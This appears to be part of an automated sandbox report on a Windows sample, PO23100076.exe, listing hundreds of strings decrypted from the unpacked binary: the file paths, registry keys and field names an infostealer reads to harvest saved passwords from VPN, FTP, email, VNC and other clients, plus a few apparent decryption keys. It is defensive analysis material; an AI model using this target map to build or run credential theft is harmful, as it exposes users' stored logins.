Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Dyn\Updater\config.dyndns
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: username=
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: password=
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: https://account.dyn.com/
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: t6KzXhCh
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Dyn\Updater\daemon.cfg
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: global
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: accounts
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: account.
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: username
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: account.
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Psi/Psi+
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: name
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Psi/Psi+
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: APPDATA
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Psi\profiles
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: APPDATA
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Psi+\profiles
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \accounts.xml
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \accounts.xml
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: OpenVPN
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs\
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: username
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: auth-data
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: entropy
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: USERPROFILE
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \OpenVPN\config\
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: remote
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: remote
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: NordVPN
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: NordVPN
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: NordVpn.exe*
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: user.config
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: //setting[@name='Username']/value
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: //setting[@name='Password']/value
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: NordVPN
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Private Internet Access
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: %ProgramW6432%
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Private Internet Access\data
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Private Internet Access\data
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \account.json
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ."username":"(.?)"
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ."password":"(.?)"
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Private Internet Access
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: privateinternetaccess.com
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: FileZilla
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: APPDATA
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: APPDATA
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <Server>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <Host>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <Host>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: </Host>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <Port>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: </Port>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <User>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <User>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: </User>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: </Pass>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <Pass>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: </Pass>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: CoreFTP
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SOFTWARE\FTPWare\COREFTP\Sites
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: User
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Host
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Port
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: hdfzpysvpzimorhk
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: WinSCP
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: HostName
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: UserName
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: PublicKeyFile
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: PortNumber
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: [PRIVATE KEY LOCATION: "{0}"]
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: WinSCP
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ABCDEF
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Flash FXP
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: port
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: user
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: pass
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: quick.dat
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Sites.dat
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \FlashFXP\
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \FlashFXP\
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: FTP Navigator
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SystemDrive
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \FTP Navigator\Ftplist.txt
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Server
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: No Password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: User
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SmartFTP
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: APPDATA
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: WS_FTP
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: appdata
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: HOST
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: PWD=
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: PWD=
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: FtpCommander
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SystemDrive
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SystemDrive
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SystemDrive
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \cftp\Ftplist.txt
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ;Password=
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ;User=
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ;Server=
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ;Port=
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ;Port=
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ;Password=
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ;User=
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ;Anonymous=
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: FTPGetter
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \FTPGetter\servers.xml
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <server>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <server_ip>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <server_ip>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: </server_ip>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <server_port>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: </server_port>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <server_user_name>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <server_user_name>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: </server_user_name>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <server_user_password>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: <server_user_password>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: </server_user_password>
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: FTPGetter
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: The Bat!
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: appdata
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \The Bat!
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Account.CFN
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Account.CFN
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Becky!
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: DataDir
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Folder.lst
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Mailbox.ini
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Account
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: PassWd
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Account
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SMTPServer
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Account
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: MailAddress
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Becky!
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Outlook
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Email
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: IMAP Password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: POP3 Password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: HTTP Password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SMTP Password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Email
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Email
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Email
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: IMAP Password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: POP3 Password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: HTTP Password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SMTP Password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Server
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Windows Mail App
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Software\Microsoft\ActiveSync\Partners
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Email
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Server
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SchemaId
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: pResourceElement
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: pIdentityElement
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: pPackageSid
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: pAuthenticatorElement
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: syncpassword
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: mailoutgoing
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: FoxMail
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Executable
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: FoxmailPath
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Storage\
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Storage\
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \mail
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \mail
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Accounts\Account.rec0
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Accounts\Account.rec0
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Account.stg
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Account.stg
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: POP3Host
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SMTPHost
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: IncomingServer
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Account
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: MailAddress
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: POP3Password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Opera Mail
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: opera:
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\\|';:,<>/?+=
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: PocoMail
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: appdata
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Pocomail\accounts.ini
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Email
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: POPPass
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SMTPPass
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SMTP
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: eM Client
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: eM Client\accounts.dat
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: eM Client
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Accounts
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: "Username":"
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: "Secret":"
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: "ProviderName":"
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: o6806642kbM7c5
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Mailbird
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SenderIdentities
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Accounts
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \Mailbird\Store\Store.db
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Server_Host
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Accounts
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Email
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Username
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: EncryptedPassword
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Mailbird
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: RealVNC 4.x
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: RealVNC 3.x
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SOFTWARE\RealVNC\vncserver
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: RealVNC 4.x
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: SOFTWARE\RealVNC\WinVNC4
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: RealVNC 3.x
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Software\ORL\WinVNC3
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: TightVNC
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: TightVNC
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: PasswordViewOnly
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: TightVNC ControlPassword
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ControlPassword
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: TigerVNC
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Software\TigerVNC\Server
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Password
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: UltraVNC
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: passwd
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: UltraVNC
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: passwd2
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: UltraVNC
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: passwd
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: UltraVNC
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: passwd2
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: UltraVNC
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: passwd
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: UltraVNC
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: passwd2
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: UltraVNC
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: passwd
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: UltraVNC
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: passwd2
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: JDownloader 2.0
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: JDownloader 2.0\cfg
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: JDownloader 2.0\cfg
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Paltalk
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack	String decryptor: nickname

Source: PO23100076.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: PO23100076.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

